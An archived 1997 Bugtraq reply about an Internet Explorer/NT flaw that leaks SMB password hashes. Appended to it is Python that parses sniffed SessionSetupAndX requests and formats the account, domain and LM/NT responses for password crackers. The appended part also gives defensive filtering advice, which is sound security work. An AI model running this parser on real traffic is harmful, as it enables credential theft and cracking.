[4483] in bugtraq
Re: NT4.0 SP3 Still vulnerable
daemon@ATHENA.MIT.EDU (Rubens Kuhl Jr.)
Fri May 16 01:13:39 1997
Date: Thu, 15 May 1997 22:15:43 -0300
Reply-To: "Rubens Kuhl Jr." <rkuhljr@PUERIDOMUS.BR>
From: "Rubens Kuhl Jr." <rkuhljr@PUERIDOMUS.BR>
X-To: Aaron Spangler <pokee@MAXWELL.EE.WASHINGTON.EDU>
To: BUGTRAQ@NETSPACE.ORG
| I reported an Internet Explorer Security hole more than 2 months ago to
| Microsoft. The bug allows Websites to capture usernames and encrypted
| passwords from unsuspecting Windows NT users who have Internet Explorer.
|
| At first Microsoft told me they would Patch Internet Explorer. Then came
| Internet Explorer 3.02, which was supposed to fix ALL of the security
| holes from that month. (According to MS's Web page)
|
| But IE 3.02 did not fix the security hole!
|
| Then Microsoft told me that NT 4.0 Service Pack 3 will definitely fix the
| hole.
|
| I just downloaded it. It does NOT fix the security hole!
As far as I know, IE 3.02 corrected only sending NTLM logins through HTTP
connections, and I suppose you are talking about capturing
username/password hashes sent via SMB/CIFS (file://aaa.bbb.ccc.ddd).
I'm still downloading SP3, but after a look at the readme it looked to me as if
SP3 could empower an administrator to fix such a bug by enabling the SMB
signing feature; it would not fix it at installation.
And with or without SP3, filtering routers blocking ports 135/137/138/139
make this exploit and similar ones limited to Intranets.
| To date, Microsoft has not fixed this and similar security holes! Maybe an
| exploit code release to BUGTRAQ is in order to help speed things up.
Hasn't exploit code already been released to SAMBA-DIGEST? It captures the
password hashes, which someone could pass to l0phtcrack and similar
crackers.
Other exploits, such as real-time password cracking, haven't been released,
but I'm not sure if such a release would make Microsoft go faster.
| By the way, I have been conversing with CERT the last 2 months, and they
| still believe that Microsoft will fix the problem and CERT does not want
| to issue an Advisory until the bug is fixed. However CERT should at least
| be notifying administrators to warn users not to use Internet Explorer
| until this bug is fixed.
I think that's why BugTraq exists.
Rubens Kuhl Jr.
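What the capture discussed above actually yields: when IE follows a file:// URL to a remote host, the NT redirector opens an SMB session and sends the LM and NT challenge responses, plus the account and domain names, in the SessionSetupAndX request. The example below is added here and is not the post's code nor the SAMBA-DIGEST exploit; it parses that request from a constructed sample packet (the response bytes, challenge, user and domain are made up, not a real capture) to show exactly which fields a passive sniffer harvests. Two points a practitioner should keep in mind: the 8-byte server challenge is not in this packet but in the server's earlier Negotiate Protocol response, so a sniffer must record both before the pair can be fed to a cracker; and because the victim's client connects outbound to the attacker's server, a border filter must block outbound TCP 139 (and UDP 137/138) from clients, not only inbound traffic. SMB signing, once enabled, protects messages after session setup; the challenge/response itself is still sent to whatever server answered.

```python
"""Parse the fields a sniffer harvests from an SMB (NT LM 0.12)
SessionSetupAndX request: account, domain, LM and NT 24-byte responses.
Added example; the sample packet is constructed here, not a real capture."""
import struct

SMB_MAGIC = b"\xffSMB"
SMB_COM_SESSION_SETUP_ANDX = 0x73
FLAGS2_UNICODE = 0x8000
HEADER_LEN = 32                          # fixed SMB header
DATA_OFFSET = HEADER_LEN + 1 + 26 + 2    # WordCount, 13 parameter words, ByteCount


def _read_cstr(buf, off, unicode):
    """Read one NUL-terminated string (ASCII or UTF-16LE) starting at off."""
    if unicode:
        end = off
        while buf[end:end + 2] != b"\x00\x00":
            if end + 2 > len(buf):
                raise ValueError("unterminated Unicode string")
            end += 2
        return buf[off:end].decode("utf-16-le"), end + 2
    end = buf.index(b"\x00", off)
    return buf[off:end].decode("ascii"), end + 1


def parse_session_setup(pkt):
    """Return user, domain, OS strings and hex LM/NT responses from one request."""
    if pkt[:4] != SMB_MAGIC:
        raise ValueError("not an SMB message")
    if pkt[4] != SMB_COM_SESSION_SETUP_ANDX:
        raise ValueError("not SessionSetupAndX (command 0x%02x)" % pkt[4])
    flags2 = struct.unpack_from("<H", pkt, 10)[0]
    unicode = bool(flags2 & FLAGS2_UNICODE)
    if pkt[HEADER_LEN] != 13:
        raise ValueError("unsupported variant (WordCount %d)" % pkt[HEADER_LEN])
    (_andx_cmd, _andx_res, _andx_off, _max_buf, _max_mpx, _vc, _sess_key,
     lm_len, nt_len, _reserved, _caps) = struct.unpack_from("<BBHHHHIHHII", pkt, HEADER_LEN + 1)
    byte_count = struct.unpack_from("<H", pkt, HEADER_LEN + 1 + 26)[0]
    if lm_len + nt_len > byte_count:
        raise ValueError("password lengths exceed ByteCount")
    end = DATA_OFFSET + byte_count
    lm_resp = pkt[DATA_OFFSET:DATA_OFFSET + lm_len]
    nt_resp = pkt[DATA_OFFSET + lm_len:DATA_OFFSET + lm_len + nt_len]
    off = DATA_OFFSET + lm_len + nt_len
    if unicode:
        off += off % 2   # Unicode strings are 16-bit aligned from the SMB start
    names = []
    while off < end and len(names) < 4:
        s, off = _read_cstr(pkt, off, unicode)
        names.append(s)
    names += [""] * (4 - len(names))   # AccountName, PrimaryDomain, NativeOS, NativeLanMan
    return {"user": names[0], "domain": names[1],
            "native_os": names[2], "native_lanman": names[3],
            "lm_response": lm_resp.hex(), "nt_response": nt_resp.hex()}


def build_session_setup(user, domain, lm_resp, nt_resp, unicode=True,
                        native_os="Windows NT 1381", native_lanman="Windows NT 4.0"):
    """Build a constructed NT LM 0.12 SessionSetupAndX request (test input only)."""
    flags2 = FLAGS2_UNICODE if unicode else 0
    header = (SMB_MAGIC + bytes([SMB_COM_SESSION_SETUP_ANDX])
              + b"\x00" * 4                                 # NT status
              + b"\x18"                                     # Flags
              + struct.pack("<H", flags2)
              + b"\x00" * 2 + b"\x00" * 8 + b"\x00" * 2     # PIDHigh, signature, reserved
              + struct.pack("<HHHH", 0, 0xfeff, 0, 1))      # TID, PID, UID, MID
    params = struct.pack("<BBHHHHIHHII", 0xff, 0, 0, 0xffff, 2, 0, 0,
                         len(lm_resp), len(nt_resp), 0, 0)
    data = lm_resp + nt_resp
    enc, term = ("utf-16-le", b"\x00\x00") if unicode else ("ascii", b"\x00")
    if unicode and (DATA_OFFSET + len(data)) % 2:
        data += b"\x00"   # pad so the Unicode strings start 16-bit aligned
    for s in (user, domain, native_os, native_lanman):
        data += s.encode(enc) + term
    return header + bytes([13]) + params + struct.pack("<H", len(data)) + data


def crack_line(fields, server_challenge):
    """Pair the harvested responses with the 8-byte challenge from the server's
    Negotiate response. Colon-separated form is illustrative, not any one
    cracker's exact input syntax."""
    return ":".join([fields["user"], fields["domain"], server_challenge.hex(),
                     fields["lm_response"], fields["nt_response"]])


# Constructed sample values: not real responses, not a real challenge.
SAMPLE_LM = bytes(range(0x10, 0x28))
SAMPLE_NT = bytes(range(0x30, 0x48))
SAMPLE_CHALLENGE = bytes.fromhex("0123456789abcdef")
SAMPLE_PACKET = build_session_setup("victim", "NTDOMAIN", SAMPLE_LM, SAMPLE_NT)

if __name__ == "__main__":
    harvested = parse_session_setup(SAMPLE_PACKET)
    print(harvested)
    print(crack_line(harvested, SAMPLE_CHALLENGE))
```

The parser handles only the 13-word NT LM 0.12 request form that NT 4.0 clients send, in both the ASCII and Unicode (Flags2 bit 0x8000) string encodings; extended-security variants are rejected rather than misparsed.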